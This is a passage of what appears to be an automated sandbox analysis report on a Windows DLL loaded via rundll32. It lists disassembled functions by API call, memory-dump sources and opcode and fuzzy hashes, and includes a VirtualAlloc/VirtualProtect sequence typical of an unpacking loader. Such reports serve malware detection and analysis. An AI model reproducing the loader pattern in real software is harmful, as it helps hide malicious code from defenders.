                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0211E7B1A51A3BEBDF56CBE8CC44B4933A6AB06771F110131ED10AB280F771E900D6E5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,6E24F667,00000000,?,?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001), ref: 6E257C03
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001,00000000,00000001,?,6E253E74,6E24F5F6), ref: 6E257C0F
                                                                                                                                                                                                                                                                • Part of subcall function 6E257BD5: CloseHandle.KERNEL32(6E280910,6E257C1F,?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001,00000000,00000001), ref: 6E257BE5
                                                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 6E257C1F
                                                                                                                                                                                                                                                                • Part of subcall function 6E257B97: CreateFileW.KERNEL32(6E27DD58,40000000,00000003,00000000,00000003,00000000,00000000,6E257BC6,6E256B6D,00000001,?,6E253920,00000000,?,00000001,00000000), ref: 6E257BAA
                                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,6E24F667,00000000,?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001,00000000), ref: 6E257C34
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                                                                              • Opcode ID: b8a3c2d4f3e027c01c4519c95c00a2e43dd96b32b4bbfd7e1e847355b424f5e8
                                                                                                                                                                                                                                                              • Instruction ID: 0fad53ec8f39865773cb05afd6fdcb7d093020679fa9ef379c28d833fdf3d6f3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8a3c2d4f3e027c01c4519c95c00a2e43dd96b32b4bbfd7e1e847355b424f5e8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F01C3615252DBBDF221FD1CD0CD8E3F67FB4A7A1F048410FA29952A0D6328930DBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000003.00000002.473721051.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                              • API String ID: 0-2837366778
                                                                                                                                                                                                                                                              • Opcode ID: 501f590428818e887053cf3f6616a71a42033faa34f44bd7d3758850a7eff650
                                                                                                                                                                                                                                                              • Instruction ID: 1ad3c28a8a6d09b50ad11c6972f6dde0f9bedd6cfce1a7e547426059725078ce
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 501f590428818e887053cf3f6616a71a42033faa34f44bd7d3758850a7eff650
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2341B675A4061DEFEB15DBDDCD819AEBBBEEF86B10F104566E4049B200DB704A48CB54
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,0000079C,00003000,00000040,0000079C,6E281E18), ref: 6E282480
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,000000C6,00003000,00000040,6E281E7C), ref: 6E2824B7
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00013F51,00003000,00000040), ref: 6E282517
                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E28254D
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(6E200000,00000000,00000004,6E2823A2), ref: 6E282652
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(6E200000,00001000,00000004,6E2823A2), ref: 6E282679
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000002,6E2823A2), ref: 6E282746
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000002,6E2823A2,?), ref: 6E28279C
                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2827B8
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475916995.000000006E281000.00000040.00020000.sdmp, Offset: 6E281000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2574235972-0
                                                                                                                                                                                                                                                              • Opcode ID: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                              • Instruction ID: 4b26e144eb0f30125ca8cf8778d3c913a39bd59d814e1bc44f7fea5d4559b8e0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CD1A1762002869FDF05CF54C880F5277A6FF48710B0A45A4EE0AAF79BE771B854DB62
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3136044242-0
                                                                                                                                                                                                                                                              • Opcode ID: e19c01fcb2dabf9c0c44a239570506d0250d6b4427132a8591807f2bc07d51fd
                                                                                                                                                                                                                                                              • Instruction ID: 705ad72f6a5fe38e9a0e5b315135d9e22414935cab2c587c03429561aff63af6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e19c01fcb2dabf9c0c44a239570506d0250d6b4427132a8591807f2bc07d51fd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0215E71D0061EEBDB6A8F95C840EAE3A7BDB85B95B014525FC255E290C7308E418BA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6E247387
                                                                                                                                                                                                                                                                • Part of subcall function 6E247BA4: RtlInitializeSListHead.NTDLL(6E28C780), ref: 6E247BA9
                                                                                                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E2473F1
                                                                                                                                                                                                                                                              • ___scrt_fastfail.LIBCMT ref: 6E24743B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                              • String ID: y$n
                                                                                                                                                                                                                                                              • API String ID: 2097537958-731774800
                                                                                                                                                                                                                                                              • Opcode ID: 03c773252a9e12d70e1c67b1885047d40bc49dc83ff66e8d85105ef952ee57e9
                                                                                                                                                                                                                                                              • Instruction ID: 8954ef7617c6d924e6ce9f91539b90214a53234a7020ba776fc2eebe994fa279
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03c773252a9e12d70e1c67b1885047d40bc49dc83ff66e8d85105ef952ee57e9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF218B7A54820FDBDB096BF8D8097EC3B679F1672EF148859D8A12B2C0CF610059CA66
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualProtectEx.KERNELBASE(000000FF,?,00000040,?), ref: 6E2435B3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                                                              • Opcode ID: 996d633ea626452ab40b7dfb5da83b087e001bb6e929cf651f99603bdff3cc6d
                                                                                                                                                                                                                                                              • Instruction ID: 9e621d7e490cae96721b55ff86c8e64f1fb65524c23add39a7f6dafa8c3cfb7f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 996d633ea626452ab40b7dfb5da83b087e001bb6e929cf651f99603bdff3cc6d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3711571902669CFEB08CF6DC498FAA7BE7BB57311F14415AE494C7381E2749A0CDBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E2509B9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                              • Opcode ID: 66f3c8a693f09f42fb919abce03e47394efc5414737a242b3a9abce372e767f5
                                                                                                                                                                                                                                                              • Instruction ID: 8aa9aa82f3e41d2da4603ccd25f63f87c821ec4ea9052e358124c3257df15ba9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66f3c8a693f09f42fb919abce03e47394efc5414737a242b3a9abce372e767f5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08F02B31A0562EDBFB014BE28E08F4B375FBF82F79B008011A814A628CEB20D46085A1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 6E25297E
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2556CE
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2556E0
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2556F2
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255704
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255716
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255728
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E25573A
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E25574C
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E25575E
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255770
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255782
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255794
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2557A6
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252973
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252995
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529AA
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529B5
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529D7
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529EA
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529F8
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A03
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A3B
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A42
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A5F
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A77
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                                                              • Opcode ID: 2706613bc3fe4d7871bb49d5b961138428d4b3bda9693c2543306a75642eae05
                                                                                                                                                                                                                                                              • Instruction ID: a1f6c58fbec234201d03a5bc36db65965b970f2bf4816e9e9d317b879f3df945
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2706613bc3fe4d7871bb49d5b961138428d4b3bda9693c2543306a75642eae05
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E317E7260430ADFEB648BB4D940B9673FABF00315F214919E859D7394DB31E8608F54
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2495CB
                                                                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 6E2495F2
                                                                                                                                                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 6E2496FE
                                                                                                                                                                                                                                                              • CatchIt.LIBVCRUNTIME ref: 6E249753
                                                                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2497D9
                                                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 6E249860
                                                                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 6E24987B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                                              • API String ID: 4234981820-393685449
                                                                                                                                                                                                                                                              • Opcode ID: b6b17fca80f3cb50e50b4d0ea7fb6e4f96aa1ff1f15266f60859f35ae1368ddf
                                                                                                                                                                                                                                                              • Instruction ID: 160249d89df068963552cd649ea77627728e6263509fd8de27253d315037fbcb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b17fca80f3cb50e50b4d0ea7fb6e4f96aa1ff1f15266f60859f35ae1368ddf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCC1477580420FEFCF19CFE8CA80A9EBBBAAF44315B10455AE8156B215D731DA61CFA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D27E
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D28A
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D295
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2A0
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2AB
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2B6
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2C1
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2CC
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2D7
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2E5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              • Opcode ID: e6da5f92d362b55d93d3388bfef68d76fdb6f112e1e418cb8713eb5f4aefd41a
                                                                                                                                                                                                                                                              • Instruction ID: 1433ab1b34e22722da2806a0309129cf9853433b43f1ae47800fca3b43ae2161
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6da5f92d362b55d93d3388bfef68d76fdb6f112e1e418cb8713eb5f4aefd41a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E21747A94010CEFCF45DFE4D890DDE7BBAEF08244B0189A6F9199B121DB71EA558F80
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: a5717e4bb782f467b2c0614b6691c31b0ca5f588a961291a44c73a8c66686b07
                                                                                                                                                                                                                                                              • Instruction ID: fb11d168f9d7ad919091496241c2ee8d314936071d988ac48877c6ab8e3cc270
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5717e4bb782f467b2c0614b6691c31b0ca5f588a961291a44c73a8c66686b07
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93C1CFB4A0420E9FDB05CFD9C994FAEBBB6BF4A319F004559E8149B381E7709951CF21
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E255818: _free.LIBCMT ref: 6E25583D
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E25589E
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2558A9
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2558B4
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E255908
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E255913
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E25591E
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E255929
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              • Opcode ID: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                              • Instruction ID: fee60e6893048a2432fc334691462a7326bdbd6e35a6d083ec0d53926620e21c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F116D75591B0CEBE720A7F0DD0AFCB779EAF00704F408C14B69E66250DB65A5554F90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6E253593
                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 6E253772
                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 6E25378F
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,6E24F5F6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2537D7
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E253817
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2538C3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4031098158-0
                                                                                                                                                                                                                                                              • Opcode ID: f100bf019aaf72c076221a591bef9e9b3764a364c382b3106dcebdc342a62c44
                                                                                                                                                                                                                                                              • Instruction ID: afc0f8564cf7d9b32822ba571010b024c1d9b2059c3a6f6727d804321754e951
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f100bf019aaf72c076221a591bef9e9b3764a364c382b3106dcebdc342a62c44
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91D1B9B5D0024D9FDB05CFE8CA889EDBBB6BF09314F24116AE855BB345D330A916CB60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,6E248DA8,6E24700A,6E247312), ref: 6E2491A7
                                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2491B5
                                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2491CE
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,6E248DA8,6E24700A,6E247312), ref: 6E249220
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                                              • Opcode ID: f7c3ee54ed675d6a64d536ca859dc75e0d46927bce43e8f0bcdca5955d0280af
                                                                                                                                                                                                                                                              • Instruction ID: 676e20a78a045e76bfdf9cfb25cfec19599d546950a3838bc7cbc2bc4b3aef2b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7c3ee54ed675d6a64d536ca859dc75e0d46927bce43e8f0bcdca5955d0280af
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B00145B625AA1FDFFB0D06F9ED89D973A5BEB03779B200639E520410C0FB914834D120
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                                                                              • String ID: y$n
                                                                                                                                                                                                                                                              • API String ID: 1740715915-731774800
                                                                                                                                                                                                                                                              • Opcode ID: 1eeead3c6870d0c88a81e7958a376a8111e416108ebdddd480f7da9cc7db7347
                                                                                                                                                                                                                                                              • Instruction ID: 3f96966e916fc6aae95d4a93a7f1fd0844c7ddb89262a95d318546c867919952
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1eeead3c6870d0c88a81e7958a376a8111e416108ebdddd480f7da9cc7db7347
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C251D17660460FDFEB1D9FD9CA50BAA7BAAEF02705F104929E815462D4D731E860CB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E25120C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                              • API String ID: 0-2837366778
                                                                                                                                                                                                                                                              • Opcode ID: bdb415f4945ab409c4e6a9987e6e15b795458757d5cd1c3de59f2b2b806a0c71
                                                                                                                                                                                                                                                              • Instruction ID: 236c4c828d092802a2122237360690147cd77cbd8ffd86e20c3279554e2a0014
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdb415f4945ab409c4e6a9987e6e15b795458757d5cd1c3de59f2b2b806a0c71
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64217175614A2EBF97005FE59E80D9677AFAB0536D7004D14F918D6350E731ECA88BA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557C7
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557D9
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557EB
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557FD
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E25580F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.475669049.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              • Opcode ID: d49535a4ef8ca49a0275abb315b68194c4567bf6e5752b47c39ad4faf8bbe7ea
